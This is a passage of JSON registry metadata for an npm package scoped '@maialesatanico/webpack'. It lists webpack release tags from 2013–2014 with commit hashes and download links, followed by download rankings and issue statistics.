ublished_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-28T01:14:00.133Z","dependent_packages_count":1,"downloads":15,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":67.1478523871876,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":19.76453837637983},"purl":"pkg:npm/%40maialesatanico/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@maialesatanico/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@maialesatanico/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@maialesatanico/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T00:11:08.805Z","issues_count":10164,"pull_requests_count":9440,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2773483.7856259136,"issues_closed_count":9898,"pull_requests_closed_count":8891,"pull_request_authors_count":1445,"issue_authors_count":6685,"avg_comments_per_issue":5.83530106257379,"avg_comments_per_pull_request":3.1801906779661016,"merged_pull_requests_count":6026,"bot_issues_count":8,"bot_pull_requests_count":2913,"past_year_issues_count":80,"past_year_pull_requests_count":940,"p